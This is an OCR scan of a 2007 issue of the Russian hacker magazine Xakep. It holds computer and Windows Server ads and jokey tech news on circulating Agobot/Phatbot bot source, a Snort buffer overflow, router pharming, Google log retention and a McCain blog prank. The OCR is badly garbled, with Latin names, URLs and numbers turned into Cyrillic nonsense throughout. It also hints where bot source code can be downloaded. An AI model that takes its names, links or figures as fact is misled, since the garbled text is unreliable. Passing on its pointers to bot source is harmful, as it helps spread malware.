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Единственное, что не умеет 
домашний компьютер РІ-ЕХТКОЫ® 
- это готовить тосты... 



...Но в модели РІЕХТНОИ® Епегдо 6300 
специалисты компании "Ф-Центр" 
решили и эту проблему! 



Основные характеристики: 

М Двухъядерный процессор Іпіеі® 
Соге™ 2 йио Е6300 
М 1СВООК2 533 
% 250СВ ЗАТА7200 16МВ 
М 512МВ Касіеоп 1600 РРОй 
М ОУОШ 
М СагсІ Реасіег 35-іп-І 
М ѴѴіпсІоѵѵз Ѵізіа Ноте 



Основные характеристики (продолжение): 

Ѣ Мощность: 900 Вт 
М Нержавеющая сталь 
М Отделений/ломтиков хлеба:2/2 
М Автоматическое центрирование тостов 
М Решетка для булочек 
М Съемный поддон для крошек 
М Отдельная кнопка прерывания 
приготовления тостов 
М Бесступенчатый терморегулятор 




ЯеА іг п 



РІ-ЕХТВОМ - ВЫ ИМЕЕТЕ 
ПРАВО НА ЛУЧШЕЕ! 



Компьютер РІ.ЕХТКОІЧ® Епегдо 6300 на базе процессора 
Іпіеі® Соге™2 Оио с ѴѴіпсІоѵѵз® Ѵізіа™ + Тостер 



"ф.Центр 
рекомендует 

ѴѴіпсІоѵѵз® Ѵізіа™ Шіітаіе 



22 990 





КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



Москва 

м. "Бабушкинская", ул. Сухонская, 7А 
м. "Улица 1905 года", ул. Мантулинская, 2 
м, "Владыкино", Алтуфьевское ш., 16 



Иркутская область 

Ангарск, 278 квартал, д.2, Альфа-Маэстро, (3951) 514 514, 

540 009 

Хабаровский край 

Николаевск на Амуре, Горького 90, (42135) 2 30 08 
Николаевск на Амуре, Советская 117, (42135) 2 40 17 

Московская область 

Зеленоград, Панфиловский пр-т 10, 534 18 82, 534 2215 



Единая справочная: (495) 105-64-47 



Интернет-магазин: ѵшѵж.ГсепІег.ги 



Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо І_о§о, Соге Іпзісіе, Іпіеі, Іпіеі І_о§о, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе І_оцо, іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іпзісіе, Хеоп, и Хеоп Іпзісіе 
являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениями на территории США и других стран. 








ПРИКИНЬ, РУЛ ЕЗН0МУХАЦКЕРСК0МУ ЖУРНА- 
ЛУ ][ 100 ЛЕТ! ТЬФУ, 100 НОМЕРОВ. БРАТЕЛЛО, 
ЭТО РЕАЛЬНОЕ СОБЫТИЕ, И Я ПРЕДЛАГАЮ НАМ 
ВСЕМ СРОЧНО ПЕРЕСЕЧЬСЯ И КАК СЛЕДУЕТ 
ПОТУСИТЬ. ЗАЛЕТАЙ, АМИГО. Я УЖЕ ПОЗВАЛ 
СТАРИЧКОВ: СИНТЕЗА, ЯДЫЧА, ФЕДЮ ДОБРЯН- 
СКОГО И ДАНЮ С ОСЛИКОМ. ПРИХОДИ, И МЫ 
ПИНЦЕТНО ОТОЖЖЕМ. 

пікііогг, главред 

Чтобы попасть на нашу хацкерскую вечеринку, 
тебе нужно вырвать из журнала приглашение 
и зарегистрироваться на сайте рагіѵ.хакер.ги . 
Увидимся! 



рагіу.хаКер.ги 
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НИКОЛАЙ «ѲОРИ» АНДРЕЕВ 

/СОНШМ@НЕАЬ. ХАКЕР. ПЦ/ 



Панда ботов не любит, 
а Горл любит 

Мне безумно «нравится» манера некоторых необычных вирмейкеров 
ловить чужого червяка или бота, как-нибудь его модифицировать и 
пускать обратно в Сеть. Неудивительно, что потом появляется миллион 
биллютеней безопасности с сообщениями о куче новых, еще более опас- 
ных, но, о чудо, уже излечиваемых модными антивирусами малварей. 
Самым излюбленными для модификаций и обновления стали СаоЪоі: 
и ЗсІЪоі:. По данным РапбаЬаЬз Г \ѵ\у\у.ѵіги5ІаЪ.ги) . за последний год 74% 
всех пойманных ботов принадлежали именно этим семействам. Я могу 
объяснить такую популярность этих малварей среди вирапдейтеров 
одним очень простым обстоятельством. Сорцы обоих ботов можно без 
особых проблем найти в интернете. В паблике! 

Взять, например, СаоЪоі:. Лаборатория Касперского называет его А§оЪоі:, 
а авторы, собственно, окрестили его РЪаіЪоГом. Если, по обыкновению, 
погуглить запросом «а§оЪоі: зоигсе» или чем-то вроде этого, то находится 
миллион разных антивирусных советов и мануалов по удалению и, может 
быть, даже одна ссылочка на а§оЪоі_5оигсе, правда недоступная. Поэтому 
гуглить не стоит, а лучше залезть в поиск в еМиІе с фразочкой «рЪаі:Ъоі:_5гс» 
и обнаружить 50-мегабайтные сорцы в открытом доступе на скачивание у 
нескольких человек. Наверняка, также выйдет и с ЗсІЪоі:. Вот потому они и 
популярные. Кстати, из 50 Мб сорцов Фэтбота самих исходников всего 4 Мб. 
Скачивать желающему придется все, и, наверняка, он попадет в очередь из 
десяти тысяч таких же, как он. Долго, в общем, качать. На любителя. 





В поросенке нашли дырку 

Представь, ставишь ты себе на по умолчанию оптимально защищенную 
ОрепВЗП какую-нибудь мощную и функциональную защиту, чтобы 
свести вероятность взлома твоего любимого сервака к нулю. Настра- 
иваешь, полируешь, натираешь. Все отлично работает, и живешь ты в 
безопасном счастье и радости до тех пор, пока не оказывается, что тебя 
поимели через багу как раз в этой суперкрутой защите. Не было бы ее 
— все бы было ок. Есть в этом некоторый маразм, согласись? Точно есть, 
и было бы очень здорово, если бы все это было только на словах. Однако 
не судьба. Маразм в виде уязвимости, позволяющей получить полный 
доступ к компьютеру и выполнить любой код, совсем недавно проявился 
в очень популярной опенсорсовой системе обнаружения атак (ГО5) . В по- 
росенке Зпогі нашли новую дырку, не предусмотренную ни природой, 
ни разработчиками. Не знаю, кто дыру нашел, но сообщили о ней чуваки 
из Іпіегпеі Зесигііу Зузіетз. Они говорят, что там полноценное перепол- 
нение буфера в каком-то препроцессоре ОСЕ/КРС. Уязвимы поросята 
версий 2 . 6 . 1 , 2 . 6 . 1 . 1 , 2 . 6 . 1 . 2 и 2 . 7. 0 Ъеіа 1 . Во второй бетке дыру обещают 
залатать. Кажись, парась будет с одной ноздрей. 



80 % 



Между прочим, ѴѴ /О маршрутизаторов Сізсоуявимы для фарминг-атак. 

Фарминг — это вроде фишинга, только когда жертва перенаправляется на фейковый сайт 
не на клиенте, а на роутере или маршрутизаторе. 




26 дюймов от ЫЕС 

Рабочее место хакера — это, в первую очередь, дисплей. Для нормального, комфорт- 
ного хека он должен быть максимально большим, чтобы можно было одновременно 
следить за аськой, иркой, кодить в какой-нибудь среде разработке и развернуть все окна 
Олли, дабы не искать их все время через пункт меню ѴѴіпсІоѵѵз, и при этом видеть, что 
творится в окне снифера. Рабочая поверхность — это всегда очень хорошо. И компания 
ИЕС это понимает, выпуская 26-дюймовый широкоэкранный монитор КЕС МиШЗупс 
ЬСО2690Ѵ\ШХі. Графические элементы и текст на нем выглядят на 7,5% больше, чем на 
24-дюймовом монике, что значительно снижает нагрузку на глаза при круглосуточном 
сидении за компом. Рабочее разрешение 1920x1200 позволяет программерам про- 
сматривать очень много кода за раз (поместятся 2 страницы А4 рядом) . Я бы на таком с 
большим удовольствием в контру порубился, хедшотить, небось, с ним круто. А вообще 
ИЕС планировала моник не для хека и гамес, а для применения в сфере САПР, автома- 
тизированного управления производством и в настольных издательских системах. 
Поэтому в мониторе используется панель Н-ІР5 А-ТѴѴ (НогігоЩаІ ІР5 ѵѵііЪ Абѵапсесі Тше 
ѴѴісіе Роіагігег), создающая изображение самого высокого качества, а также передовая 
функция Х-Іл§Ъс Рго, которая постоянно отслеживает изменения фоновой подсветки, 
яркости и цветопередачи и автоматически корректирует соответствующие внутренние 
настройки монитора. 
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Дополнительные материалы можно найти на сайте \ѵ\ѵ\ѵ.тісго80Й.сош/т8/§е1;1;1іе^ас1;8 
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Том Нэги для «Времени надежных решений» 

СОГЧТГОКОМ, легендарный полигон Сопііпепіаі АС 

в окрестностях Іанновера, Іёрмания. 



ГОРЯЧИЕ НОВОСТИ: 

« Шпсіош Зегѵег обеспечивает 
надежную среду с возможностью 
централизованного 
администрирования и управления». 



Паулъ Швефер, 

директор по информационным 
технологиям Сопііпепіаі АС 



ш*. 




Новая информационная система гарантирует ведущему 
поставщику продукции для автомобильной 
промышленности 99,9% надежность 

Майкл Беттендорф 



ГАННОВЕР, январь 2007 г. - 
«Нам была нужна абсолютная 
надежность, недостижимая 
с нашей прежней системой», - 
говорит Пауль Швефер, 
директор по информацион- 
ным технологиям корпорации 
Сопііпепіаі АО, одного из 
крупнейших поставщиков 
продукции для автомобильной 
промышленности со штатом 
85 000 сотрудников по всему 
миру Несовершенные инстру- 
менты управления не 
позволяли команде Швефера 
поддерживать работоспособ- 
ность системы на том 
высоком уровне, который 
требуется Сопііпепіаі АО, 
поэтому была необходима 
смена платформы. 

Сначала рассматривалось 
решение на базе Ьіпих. 
Однако после тщательной 
оценки команда Швефера 
пришла к заключению, что она 
не может обеспечить надеж- 
ную и прогнозируемую среду, 
необходимую Сопііпепіаі АО. 
И в результате они выбрали 
МІСГ080Й® \УіпсІо\ѵ8 8егѵег® 
2003. 

Наличие мощных средств 
оптимизации и настройки, 



включая управление группо- 
выми политиками, позволило 
Швеферу сделать вывод 
об очевидных преимущест- 
вах ^Ѵіпс1о\ѵ8 8егѵег® 2003 
в сравнении с Ьіпих. 
«\Ѵіпёо\ѵ8 8егѵег обеспечивает 
надежную среду с возмож- 
ностью централизованного 
администрирования и упра- 
вления», - говорит Швефер, 
уверенный, что безукориз- 
ненная управляемость служит 
залогом высокой надежности. 
«Воссоздание подобного уровня 
сервиса в среде Ьіпих было бы 
сложным и дорогостоящим 
делом», - утверждает он. 

Принятое решение полно- 
стью себя оправдало. С момента 
внедрения \Ѵіпёо\ѵ8 8егѵег 2003 
поддерживает 99,9% надеж- 
ность распределенной среды 
компании Сопііпепіаі АС. 

Подробнее ознакомиться 
с опытом Сопііпепіаі АО 
и другими практическими 
примерами, а также с резуль- 
татами независимых срав- 
нительных исследований 
^іпёо\ѵ8 8егѵег и Ьіпих 
можно на сайте 
\ѵѵАѵ.тісго80і'і.сот/ги8/§еііЬеіасі8 



ГОРЯЧИЕ НОВОСТИ: Настроение ІТ-профессионалов 
напрямую связано с надежностью 

Подтверждая глобальную тенденцию, ІТ-профессионалы, такие, как 
директор по информационным технологиям корпорации Сопііпепіаі АС 
Пауль Швефер, выражают удовлетворение (см. выше) высокой 
надежностью \Ѵіпс1о\Ѵ8 8егѵег. Продолжение на 3 стр. 



Реклама 



© 2007 Місгозой Согрогайоп. Все права защищены. Владельцем товарных знаков МісгозоЙ и \Ѵіпс1о\ѵ§ 8егѵег, зарегистрированных на территории США и/или других стран, и владельцем авторских прав на их дизайн является корпорация МісгокоЙ. 
Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистрированными товарными знаками соответствующих владельцев. 
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боодіе удаляет 
миллиарды запросов 

Замечательная компания Соо§1е, знаменитая своей поисковой систе- 
мой, усиленно борется за права своих чудесных пользователей. Причем 
так усиленно, что нечаянно сделала приятно не только законопослуш- 
ным, белым и пушистым юзерам, но и нам — гадким и противным 
хакерам. На этот раз компания решила, что «приватность — это один 
из основных аспектов доверия» и что, для того чтобы им все нереально 
доверяли, совершенно необходимо удалить хранившиеся у них милли- 
арды поисковых запросов. Мол, если попросят какие-нибудь органы или 
власти предоставить информацию, что и когда искал в Гугле какой-ни- 
будь бедный хакер или еще кто-нибудь, то будут посланы к Ктулху или 
в задницу. Однако удалению подвергнутся только старые запросы. Все 
свеженькие, разумеется, будут храниться, однако не неопределенное 
время как раньше (очень долго) , а вполне конкретное — от 18 до 24 
месяцев. Плюс в ІР'шниках, записываемых в лог, будет затираться один 
байт, типа 1 27. 12. 80. X. Так что теперь компания Ооо^іе не поможет най- 
ти тебя всяким страшным дядькам из ФБР, ЦРУ, Интерпола, Европола, 
МИ-6 или еще откуда-нибудь. Правда, если вспомнить, то она и раньше 
не особо помогала. Например, как-то отказала ЦРУ в предоставлении 
доступа к базам поисковика. В общем, если учесть, что ѵѵѵѵѵѵ.уооуіе.сот 
повсеместно используется хакерами для нахождения уязвимых сайтов, 
можно с полной уверенностью назвать эту поисковую систему хакерс- 
ким сервисом. 



Уши Бѵеп спасут твоих соседей 



Компания 8ѵеп, заботясь о барабанных перепонках твоих соседей, 




выпустила мощные мультимедийные стереонаушники 5ѴЕИ СП-930, ко- 
торые смогут заменить для тебя целую акустическую систему. Дизайни- 
лись уши специально для нас с тобой : черный металлик и металлик, стро- 
гие, выверенные формы, плотно прилегающие амбушюры из мягкой 
искусственной кожи. С первого взгляда впечатляют размеры округлых 
чашечек 5ѴЕИ СП-930 с модной дужкой из пары раздельных полукруглых 
брусьев, которые держат конструкцию. Саморегулирующаяся лента, 
обшитая нежной и приятной на ощупь искусственной кожей, автома- 
тически подгоняет наушники под ушные раковины любых размеров и 
форм. По словам разработчиков, они не упустили из вида ни одной мел- 
кой детали. Регулятор громкости удобно расположен на проводе длиной 
около 4м. А позолоченный штекер — это небольшое, но 
приятное и заметное дополнение к стандартной 
комплектации. Диапазон частот ушек 
— 20-20000 Гц, следовательно, юзать 
новинку можно будет для чего угодно: 
хочешь — фильмы смотри, хочешь 
— монстров мочи. 



МісгозоЧ СИрру, КІР: 1997 - 2007 . 

Скрепка из МісгозоЧ Оиісе, сука, сдохла. Мне теперь не с кем поговорить. 



Революционный шаг РЫІірз 
в гонке за скоростью 

На фоне того, как мониторы развиваясь, реализуют все новые и но- 
вые функции (например, встроенный душ с туалетом или кухонные 
пренадлежности прямо в ЖК-дисплее), компания РЫІірз по-прежнему 
сосредоточена на создании и развитии новых технологий, позволяющих 
нереально облегчить жизнь людей и даже хакеров в самых разных ее 
областях. Сохраняя роль лидера в области инноваций в сфере технологий 
отображения, сегодня РЫІірз объявляет о новой функции 8тагі Кезропзе, 
обеспечивающей возможность регулирования времени отклика монитора 
и получения максимального удовольствия от игр, работы и просмотра 
порно. Зтагі: Кезропзе, оптимизированная для различных приложений, 
впервые применена в мониторе РЫІірз 190X7. Так, например, в играх 
время отклика может не превышать 2 миллисекунд (Сгау-Ш-Сгау), а при 
просмотре фото и изображений эта технология гарантирует наилучшее 
качество! В своем новом монике 190X7 компания РЫІірз наряду со самрт- 
респонсом объединила современный, новаторский «парусный» дизайн и 
фичу ЗтаШта^е Іліе, которая позволяет автоматически регулировать яр- 
кость, контраст, цветонасыщенность и настройки резкости, обеспечивая 
максимальное качество изображения на базе ряда таких предварительных 
установок, как «Игры», «Воспроизведение видео» или «Интернет». Жалко 
нет установок «Круглосуточная отладка в ЗоМСЕ», придется все-таки 
самому все настраивать. 
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Товар сертифицирован. Реклама. 



МЫ т СДЕЛАЛИ! ВМЕСТЕ! 

Только настоящие фанаты своего дела могут делать 
российские компьютеры мирового уровня! 




Возможности, которым завидуют... 




Компьютер йЕРО Едо 385 йНР на базе 

двухъядерного процессора Іпіеі® Соге™ 2 Оио 

предоставляет в два раза больше много- 
функциональных ресурсов для приложений 
с высокими требованиями и мультимедиа. 



( 495 ) 969 - 22-00 

ѵѵѵѵѵѵ.сіеро.ги 




Два ядра. 
Делай больше. 



Обозначения Іпіеі, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Соге Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, 
права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 
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Девайсы от Оідііі^е 



Компания Пі^іШе начала выпускать прикольные девайсы. Например, сде- 
лала флешку в подарочной упаковке на 5 1 2 Мб, 1 Гб или 2 Гб. Корпус флешки 
выполнен из металла с кусочками кожи для красоты. Цвет может быть чер- 
ный или коричневый. Радиоактивных и токсичных веществ при изготовле- 
нии не применялось, ни одного кролика не пострадало. Стоить будет от 
15 грина. Также Ні§іШе сделала трЗ-проигрывательдля автомобиля! 
Причем вроде интересный — он вставляется в прикуриватель и транслирует 
музыку в РМ-диапазоне, так что ее можно слушать своей старой, убогой, 
нефункциональной автомагнитолой. Источником музыки может быть лю- 
бое устройство, подключаемое клинейному входу или ІІЗВ-порту. Вставил 
флешку с музыкой, к примеру, и музыка с нее транслируется. Есть еще вари- 
ант девайса со встроенной ПазЬ-памятью. Если учесть, что стоит плеер от 
20 баксов, то, чувствую, скоро у каждого нормального бомбилы будет такой. 



Плеер-универсал 

Оігес решила порадовать российский рынок симпатичным портатив- 
ным мультимедиа-плеером Оігес МН2320. Честно говоря, внешний вид 
плеера действительно очень ничего — черная, практически зеркальная 
панель выглядит весьма приятно. После включения плеера юзеру откры- 
вается яркое четкое меню, причем сразу становится понятно, что дисп- 
лей у МН2320 очень качественный, а не какое-нибудь посредственное 
говно. Остается только выбрать один из пунктов меню и наслаждаться. 

С помощью этого плеера можно делать все что хочешь: просматривать 
фотографии, фильмы и порно, слушать разный треш. 

Объем встроенного харда — 20 Гб, и если тебе этого мало, то ты можешь 
найти в плеере еще и дырку для 
50-карточек. Встроенные стерео- 
динамики и удобная подставка при- 
годятся, если захочется посмотреть 
кино со свободными руками. . . Ну 
ты понял. После этого впечатления 
от Оігес МН2320 останутся самыми 
приятными. 




В России 



12,707 млн пользователей интернета старше 15 лет (всего 



в мире их 746, 9 млн). 



* М іеговой, все здоровы? 

Многим может показаться, что у наших мелкомягких друзей совсем дела с крышей плохи 
стали. Во-первых, ребятки решили не радовать в марте своих не менее мелкомягких 
пользователей апдейтами, патчами и прочими костылями. Мол, нечего глючными 
обновлениями и без того глючную винду пичкать. Во-вторых, стали рекламировать 
всякую вредоносную дрянь — самую, между прочим, настоящую малвару и спайвару. 
В-третьх, призвали всех ставить себе пиратский ѴѴіпсІоѵѵз. «Пользуйтесь, — говорят, — на 
здоровье ! » В-четвертых, судя по результатам тестирования, написали самый галимый 
антивирус, который при этом ктому же официально называется антивирусом. Тупой 
ОпеСаге даже с Нортоном рядом не лежал. 

Что случилось с МісгозоЙ:? В столовой стали плохо кормить? Мало йода? 

Наверняка. . . Однако дело не совсем в этом, да и вообще — все не так печально, как 
могло показаться. Баннеры жульнической антишпионской утилиты Зузіет Оосіюг 
2006, действительно, попали в рекламную сеть МісгозоЙ, а следовательно, и на 
веб-сайты компании и в ѴѴіпсІоѵѵз Ьіѵе Меззеп§ег. Однако проскользнули они туда по 
банальному недосмотру и были удалены сразу же, как только от бедных затрояненных 
пользователей посыпались жалобы и угрозы. Неплохая возможность постебаться над 
лоханувшимся производителем «действительно безопасной ОС», которой, разумеется, 
не преминули воспользоваться блогеры со всего света. Ок, тут фигня, едем дальше. 
Действительно, президент бизнес-группы Місгозоіт Джефф Райке сказал: «Если пираты собирают- 
ся красть у кого-то, пусть лучше крадут у нас». Ребята из Редмонда, правда, думают, что пиратство 
способствует увеличению объемов продаж их софта. Мол, попользуется человек нелегальной 
виндой, привыкнет, а потом, того гляди, лицензионную купит. Может быть, однако я знаю человек 
сто, которые, скорее, удавятся. В общем и целом, ничего страшного. 

Ок, а чего там с ОпеСаге? Да ничего, собственно, страшного. Просто рано еще сравнивать 
такого юного сигнатурного авера с гигантами индустрии вроде «Антивируса Касперского». 

Вот и получилось, что, в результате крутого независимого тестирования АѴ Сотрагайѵез 
Г ѵ\АЛА/\лаѵ-сотрагагіѵез.огу/зейеп/егуеЪпіззе/герогі:13.р(Ш . из 17-и антивирусов (ВіШеІепсІег, 

Е-Зесиге, ТгизіРогі:, МсАІее, Зутапііес, Аѵіга, АѴР и других не менее известных) мелкомягкий 
занял последнее место, обнаружив и обезвредив всего 82,40% всякой живности. Для срав- 
нения, победитель АѴК от С Ваіа Зесигйу переколбасил 99,45% заразы. В общем, достаточно 
сырая штука. 

Ну, а обновления не будут выпускаться, потому что им, сука, лень :) . 
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всех электронных писем — это спам. 
Причем, по мнению моего корпоративного 
спам-фильтра, половина писем читателей 
— это тоже спам. 



Телефон РКАйАот І_0 

Наконец! Наконец вышел стильный и функциональный телефон с 
нормальным сенсорным дисплеем! Не нужно никаких тупых стиков, 
набирания номера двумя руками и помощи других частей тела — нет, 
в телефоне РПАІ)А от БС мультитач-сенсорный интерфейс! Кнопки 
и стики идут лесом. Ну а о том, что РКАІ)А занималась разработкой 
всего пользовательского интерфейса, начиная с внешнего вида, ак- 
сессуаров, кожаных чехлов и т.п. и кончая мелодиями звонков, у меня 
вообще нет слов. 

В плане функциональности — весь уже привычный набор. Музы- 
кальный плеер (МРЗ, АСС, АСС + , ѴѴМА, КА), видеоплеер (МРЕС-4, 
Н.263, Н.264), средство просмотра документов (ррц бос, хіз, рсК, 

Ш), разумеется, поддержка ВІиеТооШ 2.0, трех диапазонов ЕЭСЕ 
(900/1800/1900), 2-мегапиксельная камера СМОЗ со светодиодной 
вспышкой, слот для карт памяти (Місго 5Э) — и все это будет ждать 
тебя в конце мая, когда телефон появится в продаже. 




10 самых больших 
баз данных в мире 

Недавно Визіпезз Ігцеііі^епсе Боѵѵсіоѵт собрал ТОР 10 крупнейших баз 
данных в мире. Ни одну из них никогда, как бы ты не изощрялся, не удас- 
тся целиком слить на винчестер после взлома. 

1. Всемирный Климатический Центр (ѴѴогІб Ваіа СегКге Іог СІітаЩ) 
собрал 220 терабайт ѵѵеЪ-данных и 6 петабайт всякого дополнительного 
треша. Погода — тяжелая штука. 

2. Американский национальный энергетический научно-исследова- 
тельский вычислительный центр (Нагіопаі Епег^у Кезеагсй ЗсіешШс 
Сотрщіп^ СеШег) — 2,8 петабайт данных, обслуживается 2000 учены- 
ми. Чего такого прикольного в базе содержится, я не в курсе. Наверняка, 
какие-нибудь ресерческие заметки об атомной энергии. 

3. Крупнейшая и старейшая телефонная (и не только) компания АТ&Т 
— 323 терабайта данных, 1,9 трлн записей о телефонных звонках. Ес- 
ли бы они хранили записи разговоров, мне кажется, вышло бы больше. 

4. Моя любимая поисковая система Соо§1е собрала 33 трлн записей в 
базе данных. До числа §оо§о1 (10 в степени 100) им пилить и пилить. 

5. Телекоммуникационная компания Зргіш собрала 2,85 трлн записей 
в базе данных, 365 млн обрабатываемых звонков в день. Производи- 
тельность у них такая, что в часы пик добавляется по 70000 записей с 
данными о звонках в секунду ! 

6. Телефонная поисковая система СЬоісеРоіпі: содержит 250 терабайт 
персональных данных, информацию о 250 млн человек. 

7. УоиТиЪе, которого сейчас трахает ѴІАСОМ (хочет миллиард баксов за 
размещение их контента), содержит 45 терабайт видео, при это обеспе- 
чивая 100 млн показов роликов в день. 

8. Атагоп.сот. судя по всему, самый популярный шоп в инете — 59 млн 
активных пользователей, 42 терабайта данных. 

9. База ЦРУ — всеобъемлющая статистика по 250 странам и куча разных 
официальных документов. Объем публиковать не дали... Разведчики. . . 

10. Библиотека Конгресса США. 530 миль полок с книгами (29 милли- 
онов книг), 20 терабайт текстовых данных. 10000 каких-нибудь штук, 
вроде книг, фотографий или карт, в день добавляется к уже хранящимся 
150 миллионам. 




61 % 



всех посещении в интернете 
приходится на порносайты. Грубо говоря, 
больше половины кликов в Сети делается 
исключительно ради удовлетворения 
сексуальных потребностей. 
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трз сІиЬ 

трЗ.затзипд.ги 



Представь... музыка без проводов 

С новым плеером Затзипд ІЫОІСО ты можешь не только наслаждаться музыкой 
в беспроводных наушниках, но и обмениваться мультимедийными файлами 
с другими устройствами, оборудованными ВІиеІооШ: компьютером, телефоном 
или плеером. Затзипд ІШ60 - прямой контакт с музыкой. 

• Поддержка беспроводных наушников 

• Обмен файлами* 

• Поддержка МРЕС4 (видео) и ТХТ файлов 

• РМ-тюнер с возможностью записи 

• 30 часов без подзарядки 



* при обновлении прошивки ѵег 1.60 (доступно с марта 2007 г.) 

Ѳ ВІиеіооІІГ 

Беспроводные наушники не входят в комплект. 




Единая служба поддержки: 8-800-200-0-400 (звонок по России бесплатный). 



Галерея Зашзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵш/.затзипд.ги. Товар сертифицирован. Реклама. 
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По данным исследования компании 
ГОС, в 2006 году в мире был создан 
161 миллиард гигабайт всякой инфы. Для 
ее содержания потребовалось бы 322 млн 
500-гигабайтных хардов общей массой 

— 644ТЫС.Т0НН.— 




И никакихтебе блинов! 

Производство ПазЬ-памяти наконец подешевело настолько, что сразу 
несколько компаний представили нашему совсем не скромному 
вниманию не какие-нибудь галимые драйвы по 2 Гб, а полноценные 
5АТА-винчестеры. Только без блинов внутри. Следовательно, без 
шума и без высокой вероятности механических повреждений. Те же 
размеры 1,8", 2,5" и 3,5", тот же 5АТА, но минимум электропотребле- 
ния, на порядок более высокие скорости передачи данных и емкости, 
кратные двойке. Назвали винчестеры на базе ПазЬ-памяти Зіаіе 
Зоіісі Пізк. ЗапПізс предлагает 2,5-дюймовый 55П емкостью 32 Гб за 
$350. Разработчики говорят, что время наработки подобного «диска» 
— где-то порядка 2 млн часов, что в 6 раз больше, чем у нынешних 
магнитных блинчиков. Но 32 Гб — маловато будет. Поэтому компа- 
ния Зирег Таіепі ТесЬпоІо^у решила анонсировать целую серию 55П 
разных размеров и емкостей: от 1,8" до 3,5" и от 16 Гб до 128 Гб. Чувс- 
твую, подобные харды очень шустро приживутся в дорогих и легких 
моделях буков. Арріе, говорят, уже подыскивает подходящий 550 
для следующей линейки буков. Мас-фанаты уже, наверное, слюнями 
захлебываются. 

Кстати, если учесть, что господа ученые вовсю придумывают способы 
уменьшения транзисторов (из миллионов которых состоит ПазЬ- 
память), то, думаю, в ближайшие пару лет мы сможем увидеть и 
терабайтный 55Н. Представь, 600-граммовый вардрайверский букс 
терабайтным 55П-винчестером и большим мультатачевым экраном. 
Эх... мечты-мечты. 



А 5ѴМАЫТЕС СКАЗАЛА, что 

Ѵ\Япс1о\ѵ5 надежнее Мае 03 X, НР-ІЖ, Зип 
Зоіагіз и Кеё Нан Ілпих. Я согласен. 



Кандидата в предизенты 
СШАзверски «поломали» 

Есть такой чувак, зовут Майк Дэвидсон, и он большой молодец. Причин 
несколько. Во-первых, он основал хорошо посещаемый новостной 
портал Иелл/зѴіпе Г ѵѵчллл/. пеѵѵзѵіпе . сот) . Правда, порталов таких 
миллион, и вряд ли этот чем-то лучше других. Во-вторых, он создал 
популярный шаблон оформления для МуЗрасе. У него там есть блог 
Гѵѵѵѵѵѵ.тѵзрасе.сот/тікеіпсіизігіез') , можешь почитать — ничего инте- 
ресного. В-третьих, он написал в блоге кандидата в президенты США 
Джона МакКейна на самом видном месте отличный текст (от имени 
МакКейна, разумеется) : 

«Я ЗАЯВЛЯЮ, ЧТО МОЕ МНЕНИЕ ПО ПОВОДУ ОДНОПОЛЫХ 
БРАКОВ ИЗМЕНИЛОСЬ. ОТНЫНЕ Я ПОДДЕРЖИВАЮ ГОМОСЕК- 
СУАЛЬНЫЕ СВАДЬБЫ, ОСОБЕННО БРАКОСОЧЕТАНИЯ ЧУВС- 
ТВЕННЫХ ЖЕНЩИН». 

Если избирателей такое заявление и не обрадует, то удивит точно. Дело 
в том, что республиканец использовал элементы оформления Майка. 

Без указания авторства. В некоторых кругах такое не прощается, однако 
Дэвидсона спровоцировало не это. Дело в том, что МакКейн не скопи- 
ровал картинки из шаблона блога к себе, как полагается, а использовал 
ссылки нате, что весят у Майка. В результате своими избирателями 
сильно загрузил сервер бедняги. Вот Майк и указал на это политику свое- 
образным способом. Весь интернет называет его хакером, в новостях 
кричат: «Дэвидсон взломал блог кандидата в президенты», «Создатель 
Иедл/зѴіпе атаковал МакКейна». Имхо, в том, чтобы поменять содержи- 
мое некоторой картинки или какого-нибудь скриптика у себя на сервере 
нет ничего противозаконного или хакерского. Он же тему оформления 
не продает, а раздает без каких либо претензий (почти) . Получается, об- 
винить его не в чем. Так вот, в-четвертых, он молодец, потому что сделал 
себе такой шикарный пиар на скандале со специфическим наездом на 
кандидата в президенты США, а в-пятых, потому что ему за это ничего 
не будет. 
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30-31 МАЯ в Москве 

пройдет Конгресс информационных 
технологий для бизнеса Іпіегор 
Мозсоѵѵ 2007. На бизнес нам пофиг, а 
вот то, что офигительная Жанночка 
Рутковская приедет, — это круто ! 



Уникальное 

предложение! 

Теперьты можешь получать журнал с КУРЬЕРОМ нетолько в 
Москве, но и в Сан кт- Петербурге, Уфе, Нижнем Новгороде, Росто- 
ве-на-Дону, Волгограде, Самаре, Казани, Перми, Екатеринбурге, 
Челябинске, Омске и Новосибирске. 

Выгоды курьерской доставки: 

1. Сокращение сроков доставки. 

Теперьдоставка курьером осуществляется за 3-6 дней. Без до- 
полнительной оплаты. 

2 . Удобно. 

Не нужно искать журнал. Тебе принесугего на работу или домой. 

3. Экономия. 

Дешевле на 1 0% и более, чем в розничной продаже. При годовой 
подписке и комплектах еще дешевле! 

Для того чтобы получать журнал курьером, необходимо 
указать в купоне и квитанции* один из двух вариантов: 

• свой рабочий адресе названием компании; 

• подробный домашний адрес (подъезд, этаж ит. д.) с альтерна- 
тивным вариантом доставки в случаетвоего отсутствия дома. 
Например, «коддоступа в подъезд» и «отдать дежурной» или «код 
доступа в подъезд» и «положить в п/я» ит.п. 

*Купон и квитанцию можно найти на странице 142. 

Дополнительную информацию по подписке можно получить 
по бесплатномутелефону 8 - 800 - 200 - 3-999 или по етаіі: 

іггіоГСдІс.ги. 



Новая бритва Вгаип 

Компания Вгаип предлагает революционное решение 
— уникальный продукт Вгаип сги2егЗ. Универсальное 
устройство, объединяющее функции бритвы, стайлера 
и триммера. Только Вгаип сги2егЗ создан для молодых и 
прогрессивных мужчин, для тех, кто ценит свою свободу 
и индивидуальность, для тех, кто не боится меняться и 
менять мир вокруг себя. И помни, модный девиз этого 
сезона: «То, что остается на лице, имеет значение», и здесь 
имеются в виду не только последствия от твоего активно- 
го образа жизни. . . 



Игры: ПеяедэаоЕ качества фнфния преѳрвтѵг игру 
